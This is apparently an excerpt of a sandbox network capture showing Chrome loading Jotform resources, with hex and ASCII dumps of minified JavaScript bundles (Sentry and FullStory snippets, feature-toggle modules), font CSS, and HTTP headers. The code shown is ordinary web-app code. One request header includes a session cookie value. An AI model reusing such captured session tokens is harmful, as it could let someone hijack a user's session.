                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC939INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 38 39 35 33 2e 37 66 34 62 31 33 62 30 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 8953.7f4b13b0.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 28 29 5b 65 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 5f 66 73 5f 64 65 76 5f 6d 6f 64 65 29 7b 76 61 72 20 74 3d 22 46 75 6c 6c 53 74 6f 72 79 20 69 73 20 69 6e 20 64 65 76 20 6d 6f 64 65 20 61 6e 64 20 69 73 20 6e 6f 74 20 72 65 63 6f 72 64 69 6e 67 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 6d 65 74 68 6f 64 20 6e 6f 74 20 65 78 65 63 75 74 65 64 22 29 3b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 74 29 2c 74 7d 76 61
                                                                                                                                                                                                                                            Data Ascii: ray(e),n=0;n<e;n++)t[n]=arguments[n];return t.every((function(e){return i()[e]}))},s=function(e){return function(){if(window._fs_dev_mode){var t="FullStory is in dev mode and is not recording: ".concat(e," method not executed");return console.warn(t),t}va
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 79 6d 6f 75 73 22 2c 69 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 22 2b 5f 66 73 5f 73 63 72 69 70 74 2c 28 73 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 72 29 5b 30 5d 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 69 2c 73 29 2c 61 2e 69 64 65 6e 74 69 66 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 61 28 6f 2c 7b 75 69 64 3a 65 7d 2c 6e 29 2c 74 26 26 61 28 6f 2c 74 2c 6e 29 7d 2c 61 2e 73 65 74 55 73 65 72 56 61 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 61 28 6f 2c 65 2c 74 29 7d 2c 61 2e 65 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 61 28 22 65 76 65 6e 74 22 2c 7b 6e 3a 65 2c 70 3a 74 7d 2c 6e 29 7d 2c 61 2e 61 6e 6f 6e 79 6d 69 7a 65 3d 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: ymous",i.src="https://"+_fs_script,(s=t.getElementsByTagName(r)[0]).parentNode.insertBefore(i,s),a.identify=function(e,t,n){a(o,{uid:e},n),t&&a(o,t,n)},a.setUserVars=function(e,t){a(o,e,t)},a.event=function(e,t,n){a("event",{n:e,p:t},n)},a.anonymize=funct
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 72 29 26 26 28 65 5b 72 5d 3d 6e 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 69 3d 6e 28 33 37 38 39 37 29 2c 61 3d 28 72 3d 69 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 66 69 6c 6c 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3a 74 2c 72 3d 65 2e 77 69 64 74 68 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f
                                                                                                                                                                                                                                            Data Ascii: rguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},i=n(37897),a=(r=i)&&r.__esModule?r:{default:r};t.default=function(e){var t=e.fill,n=void 0===t?"currentColor":t,r=e.width,i=void 0===r?
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 69 67 68 74 3a 6c 7d 2c 63 29 7d 2c 64 29 2c 61 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 32 2c 31 38 2e 31 37 4c 38 2e 38 33 2c 31 35 4c 37 2e 34 32 2c 31 36 2e 34 31 4c 31 32 2c 32 31 4c 31 36 2e 35 39 2c 31 36 2e 34 31 4c 31 35 2e 31 37 2c 31 35 4d 31 32 2c 35 2e 38 33 4c 31 35 2e 31 37 2c 39 4c 31 36 2e 35 38 2c 37 2e 35 39 4c 31 32 2c 33 4c 37 2e 34 31 2c 37 2e 35 39 4c 38 2e 38 33 2c 39 4c 31 32 2c 35 2e 38 33 5a 22 7d 29 29 7d 7d 2c 36 32 30 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c
                                                                                                                                                                                                                                            Data Ascii: eight:l},c)},d),a.default.createElement("path",{d:"M12,18.17L8.83,15L7.42,16.41L12,21L16.59,16.41L15.17,15M12,5.83L15.17,9L16.58,7.59L12,3L7.41,7.59L8.83,9L12,5.83Z"}))}},62065:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 76 61 72 20 63 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 22 6e 61 6d 65 22 29 2c 64 3d 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 63 29 3b 74 2e 67 65 74 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 64 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 5d 3b 72 65 74 75 72 6e 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69
                                                                                                                                                                                                                                            Data Ascii: unction u(e){return e&&e.__esModule?e:{default:e}}var c=(0,a.default)("name"),d=(0,s.default)(c);t.getActiveFeatureNames=(0,o.default)((0,r.default)(d),(function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[];return(0,i.default)((functi
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 67 65 74 49 73 45 6e 61 62 6c 65 64 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 69 28 6e 28 35 32 31 38 30 29 29 2c 6f 3d 69 28 6e 28 35 38 37 35 34 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 76 61 72 20 61 3d 74 2e 67 65 74 49 73 45 6e 61 62 6c 65 64 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 5d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31
                                                                                                                                                                                                                                            Data Ascii: ule",{value:!0}),t.getIsEnabled=void 0;var r=i(n(52180)),o=i(n(58754));function i(e){return e&&e.__esModule?e:{default:e}}var a=t.getIsEnabled=(0,o.default)((function(){var e,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],n=arguments.length>1
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 30 38 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 69 73 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 2c 6f 3d 6e 28 35 38 37 35 34 29 2c 69 3d 28 72 3d 6f 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 74 2e 69 73 41 63 74 69 76 65 46 65 61 74 75 72 65 4e 61 6d 65 3d 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                            Data Ascii: 0817:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.isActiveFeatureName=void 0;var r,o=n(58754),i=(r=o)&&r.__esModule?r:{default:r};t.isActiveFeatureName=(0,i.default)((function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6f 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 76 61 72 20 61 3d 74 2e 46 65 61 74 75 72 65 54 6f 67 67 6c 65 73 43 6f 6e 74 65 78 74 3d 69 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 5b 5d 29 2c 73 3d 61 2e 43 6f 6e 73 75 6d 65 72 2c 6c 3d 61 2e 50 72 6f 76 69 64 65 72 3b 74 2e 43 6f 6e 73 75 6d 65 72 3d 73 2c 74 2e 50 72 6f 76 69 64 65 72 3d 6c 7d 2c 33 35 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29
                                                                                                                                                                                                                                            Data Ascii: o)&&r.__esModule?r:{default:r};var a=t.FeatureTogglesContext=i.default.createContext([]),s=a.Consumer,l=a.Provider;t.Consumer=s,t.Provider=l},35687:function(e,t){"use strict";function n(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 76 61 72 20 6f 3d 65 2e 69 6e 63 6c 75 64 65 73 28 6c 29 3f 74 3a 61 3b 72 65 74 75 72 6e 20 74 3f 72 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2c 6e 75 6c 6c 29 3a 6e 28 7b 66 65 61 74 75 72 65 73 3a 65 7d 29 7d 29 29 7d 29 2e 70 72 6f 70 54 79 70 65 73 3d 7b 61 63 74 69 76 65 43 6f 6d 70 6f 6e 65 6e 74 3a 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 63 68 69 6c 64 72 65 6e 3a 6f 2e 64 65 66 61 75 6c 74 2e 6f 6e 65 4f 66 54 79 70 65 28 5b 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 6f 2e 64 65 66 61 75 6c 74 2e 6e 6f 64 65 5d 29 2c 69 6e 61 63 74 69 76 65 43 6f 6d 70 6f 6e 65 6e 74 3a 6f 2e 64 65 66 61 75 6c 74 2e 66 75 6e 63 2c 6e 61 6d 65 3a 6f 2e 64 65 66 61 75 6c 74 2e 73 74 72 69 6e 67 7d 7d 2c 32 38 37 38 33 3a 66 75
                                                                                                                                                                                                                                            Data Ascii: var o=e.includes(l)?t:a;return t?r.default.createElement(o,null):n({features:e})}))}).propTypes={activeComponent:o.default.func,children:o.default.oneOfType([o.default.func,o.default.node]),inactiveComponent:o.default.func,name:o.default.string}},28783:fu


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            18192.168.2.1749722172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC548OUTGET /fonts/?family=Circular HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://cdn03.jotfor.ms/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 200
                                                                                                                                                                                                                                            Last-Modified: Fri, 10 Jan 2025 12:32:36 GMT
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b81fae8c75-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC957INData Raw: 65 36 64 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 69 72 63 75 6c 61 72 22 3b 0a 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 4c 69 67 68 74 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 4c 69 67 68 74 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e
                                                                                                                                                                                                                                            Data Ascii: e6d@font-face { font-family: "Circular"; src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff) format("woff"); font-display: swap; font-style: n
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 63 75 6c 61 72 2d 42 6c 61 63 6b 49 74 61 6c 69 63 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6c 61 63 6b 49 74 61 6c 69 63 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 7d 0a 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 69 72 63 75 6c 61 72 22 3b 0a 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64
                                                                                                                                                                                                                                            Data Ascii: cular-BlackItalic.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff) format("woff"); font-display: swap; font-style: italic; font-weight: 900;}@font-face { font-family: "Circular"; src: url(https://cd
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6f 6f 6b 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 63 69 72 63 75 6c 61 72 2f 66 6f 6e 74 73 2f 43 69 72 63 75 6c 61 72 2d 42 6f 6f 6b 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 69 72 63 75 6c 61 72 22
                                                                                                                                                                                                                                            Data Ascii: n.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff) format("woff"); font-display: swap; font-style: normal; font-weight: 400;}@font-face { font-family: "Circular"
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC5INData Raw: 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: }
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.1749723104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC393OUTGET /s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 523
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "b1d1c4c5bf1bb759c4ca1d51f6f46074"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 260
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5ba3c3b78dc-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC523INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 74 68 69 73 3a 73 65 6c 66 29 2e 63 68 75 6e 6b 4c 69 73 74 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 74 68 69 73 3a 73 65 6c 66 29 2e 63 68 75 6e 6b 4c 69 73 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 32 32 22 5d 2c 7b 39 32 39 37 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 34 33 39 31 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 34 38 32 30 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 37 39 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 5d 29 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64
                                                                                                                                                                                                                                            Data Ascii: "use strict";(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7222"],{92976:function(){},43911:function(){},48200:function(){},79560:function(){}}]);!function(){try{var e="undefined"!=typeof wind


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            20192.168.2.1749724104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC436OUTGET /actions.js HTTP/1.1
                                                                                                                                                                                                                                            Host: js.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC472INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:57 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-javascript
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            last-modified: Fri, 17 May 2024 07:15:00 GMT
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            etag: W/"664703f4-2ec4"
                                                                                                                                                                                                                                            expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                            Cache-Control: max-age=315360000
                                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                                            x-static: 1
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5ba9cd04201-EWR
